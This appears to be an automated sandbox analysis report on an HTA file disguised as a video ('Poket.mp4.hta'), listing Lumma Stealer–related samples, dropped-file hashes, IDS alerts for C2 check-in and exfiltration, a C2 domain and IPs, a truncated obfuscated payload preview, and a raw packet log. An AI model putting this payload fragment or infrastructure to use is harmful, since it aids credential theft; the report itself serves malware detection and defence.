a0e9f5d64349fb13191bc781f81f42e1	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 185.161.251.21
	Set-up.exe	Get hash	malicious	LummaC, GO Backdoor, LummaC Stealer	Browse	188.114.97.3 185.161.251.21
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 185.161.251.21
	X-mas_2.3.2.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 185.161.251.21
	ReploidReplic.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 185.161.251.21
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 185.161.251.21
	Launcher.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 185.161.251.21
	GTA-5-Mod-Menu-2025.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 185.161.251.21
	AquaDiscord-2.0.exe	Get hash	malicious	LummaC	Browse	188.114.97.3 185.161.251.21
	hoEtvOOrYH.exe	Get hash	malicious	SmokeLoader	Browse	188.114.97.3 185.161.251.21

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8979
Entropy (8bit):	4.866537018464794
Encrypted:	false
SSDEEP:	192:Zxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smtjBrdcU6CDR:H1VoGIpN6KQkj2qkjh4iUxCdMUib4
MD5:	C5F74029744D2B4244E38C45B36E9035
SHA1:	804BE0E38E7D982BD937AE2B4F71EC0B23BF959A
SHA-256:	6B3BDDE6B61F7FB780B78D20B1C205C6B15C0E515DBBD9A4EDD5C9A79F2AD258
SHA-512:	8209B2FF16422EDB16E995D0CF2E07947FBBDD26F13BF654D655C9E4858F266B8D7CE766D47B5955AEEECC0883AD7FDADAB6C3493B54F9EFF008EE541D0F543D
Malicious:	false
Reputation:	low
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	5.426334484450913
Encrypted:	false
SSDEEP:	24:3KIWSKco4KmM6GjKbmOIKo+mN1s4RPQoU99t7J0gt/NK3R8UHrg8g:xWSU4Yymp+ms4RIoU99tK8NWR8WNg
MD5:	C981785E8710D665FA0CFDFC4B860873
SHA1:	B5EAE3E4C48CED55F767BF8C33C9A18E204A3981
SHA-256:	87479619237BF4A7273E9169303EA4E626207DB76A5EF49346F42EE00F13CA33
SHA-512:	F0A80309F1735A4E4171E28F1530CB344EC875CDD2FBCC12B4366C7FCF76A98767FC1809B3EBE5A62710208C262EF68241B355BE8E3752231CF15E6AD45B1E24
Malicious:	false
Reputation:	low
Preview:	@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_050jdya4.ruo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_folgnwu5.ytr.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s5tb4l1q.vju.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtvknccl.cy2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	data
Entropy (8bit):	5.577136957505929
TrID:
File name:	Poket.mp4.hta
File size:	1'645'681 bytes
MD5:	9fb3db7b334f385701b3c88d63b7e5ee
SHA1:	d901cd79292cf0f31db2f1c83a62460e1f6a1ef5
SHA256:	658d84007977b9bcbac196d09ec012e15dba6d71f026613bb08e3a0ec4aceef8
SHA512:	25a2cf3ed7f5b11ceb936c3ebd0696c5d4a63837dc2b1d90d9fa772f852d673c98d5ba8083b63f1bd9212db4f8059167248b7242cbd7c785e3941b8e08ab780c
SSDEEP:	6144:7l5Aka0fKZdWkSflCSzBeJ2IbRGeYeyWfpYBe04PebeYj4BqrrvDqHHU11kYYTGm:4j
TLSH:	0675E8742B2113D4AF75DD9ACE45E7E8EC28B50852210A5C638E1536E2078FC2BE7DBD
File Content Preview:	66K75S6ei63K74s69p6fE6eC20L41W7aZ43l57c6dJ28M69A6ch63Y4dO49J63q29q7bc76w61f72s20i63g4aX76s78a50A3dk20W27y27c3bO66E6fW72v20W28K76d61z72I20A4fA6bD62w4ec70a56E20H3ds20Q30U3bp4fm6be62z4eH70Y56e20T3cv20Y69B6cF63K4dj49l63d2eB6cT65n6eg67M74d68n3bf20r4ff6bk62u4eS

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T08:58:24.585041+0100	2058660	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (imbibelubmbe .click)	1	192.168.2.4	53299	1.1.1.1	53	UDP
2024-12-31T08:58:25.090129+0100	2058661	ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)	1	192.168.2.4	49889	188.114.97.3	443	TCP
2024-12-31T08:58:25.090129+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49889	188.114.97.3	443	TCP
2024-12-31T08:58:25.555547+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49889	188.114.97.3	443	TCP
2024-12-31T08:58:25.555547+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49889	188.114.97.3	443	TCP
2024-12-31T08:58:26.062022+0100	2058661	ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)	1	192.168.2.4	49897	188.114.97.3	443	TCP
2024-12-31T08:58:26.062022+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49897	188.114.97.3	443	TCP
2024-12-31T08:58:26.390403+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49897	188.114.97.3	443	TCP
2024-12-31T08:58:26.390403+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49897	188.114.97.3	443	TCP
2024-12-31T08:58:27.075762+0100	2058661	ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)	1	192.168.2.4	49904	188.114.97.3	443	TCP
2024-12-31T08:58:27.075762+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49904	188.114.97.3	443	TCP
2024-12-31T08:58:28.329424+0100	2058661	ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)	1	192.168.2.4	49913	188.114.97.3	443	TCP
2024-12-31T08:58:28.329424+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49913	188.114.97.3	443	TCP
2024-12-31T08:58:29.569974+0100	2058661	ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)	1	192.168.2.4	49919	188.114.97.3	443	TCP
2024-12-31T08:58:29.569974+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49919	188.114.97.3	443	TCP
2024-12-31T08:58:30.989336+0100	2058661	ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)	1	192.168.2.4	49928	188.114.97.3	443	TCP
2024-12-31T08:58:30.989336+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49928	188.114.97.3	443	TCP
2024-12-31T08:58:31.963297+0100	2058661	ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)	1	192.168.2.4	49936	188.114.97.3	443	TCP
2024-12-31T08:58:31.963297+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49936	188.114.97.3	443	TCP
2024-12-31T08:58:32.485383+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49936	188.114.97.3	443	TCP
2024-12-31T08:58:33.050798+0100	2058661	ET MALWARE Observed Win32/Lumma Stealer Related Domain (imbibelubmbe .click in TLS SNI)	1	192.168.2.4	49945	188.114.97.3	443	TCP
2024-12-31T08:58:33.050798+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49945	188.114.97.3	443	TCP
2024-12-31T08:58:33.660394+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49945	188.114.97.3	443	TCP
2024-12-31T08:58:34.513994+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49951	185.161.251.21	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 08:57:11.845020056 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:11.845052958 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:11.845125914 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:11.874833107 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:11.874860048 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.341500998 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.341644049 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.344681978 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.344691038 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.344888926 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.356400967 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.399329901 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722009897 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722069979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722121000 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722160101 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722162962 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.722179890 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722196102 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.722219944 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722301006 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.722306967 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722592115 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722623110 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722637892 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.722656012 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.722708941 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.722712994 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.828800917 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.828854084 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.828866005 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.828967094 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.829066038 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.829082012 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.834512949 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.834561110 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.834567070 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.841545105 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.841617107 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.841623068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.848778009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.848886967 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.848892927 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.856555939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.856597900 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.856604099 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.863209009 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.863265991 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.863276005 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.870656967 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.870711088 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.870719910 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.877933979 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.877981901 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.877988100 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.887005091 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.887109995 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.887115955 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.927896976 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.927951097 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.927963018 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.941241980 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.941283941 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.941293001 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.941307068 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.941342115 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.941427946 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.947519064 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.947551012 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.947629929 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.947637081 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.947722912 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.953785896 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.963690042 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.963737965 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.963743925 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.963800907 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.966229916 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.966311932 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.972934961 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.972994089 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.978759050 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.978818893 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.985049963 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.985114098 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.991516113 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.991585970 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:12.997623920 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:12.997683048 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.003736019 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.003797054 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.021580935 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.021661997 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.022061110 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.022113085 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.027040958 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.027087927 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.032527924 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.032609940 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.038769960 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.038836002 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.044981956 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.045032024 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.052290916 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.052403927 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.052408934 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.052495956 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.054524899 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.054657936 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.067138910 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.067190886 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.067215919 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.067223072 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.067236900 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.067333937 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.068723917 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.068804979 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.073561907 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.073729038 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.081598043 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.081679106 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.095767975 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.095930099 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.106708050 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.106889963 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.111219883 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.111423016 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.118252039 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.119002104 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.123804092 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.123959064 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.128757954 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.128905058 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.128935099 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.128942966 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.129091978 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.129694939 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.130464077 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.131069899 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.131215096 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.135626078 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.135761976 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.135801077 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.136055946 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.138098001 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.138187885 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.141577959 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.141685963 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.145204067 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.145335913 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.147568941 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.147660017 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.151014090 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.151181936 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.154535055 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.154735088 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.156618118 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.156760931 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.160301924 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.160393953 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.165108919 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.166105986 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.168505907 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.168612957 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.172780991 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.172853947 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.174114943 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.174233913 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.176510096 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.176580906 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.178884029 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.179241896 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.183655024 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.183751106 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.188318968 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.188502073 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.188771009 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.188776970 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.188864946 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.190577030 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.190654993 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.191952944 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.192179918 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.194263935 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.194348097 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.197808027 CET	443	49735	188.114.97.3	192.168.2.4
Dec 31, 2024 08:57:13.197917938 CET	49735	443	192.168.2.4	188.114.97.3
Dec 31, 2024 08:57:13.197983027 CET	443	49735	188.114.97.3	192.168.2.4
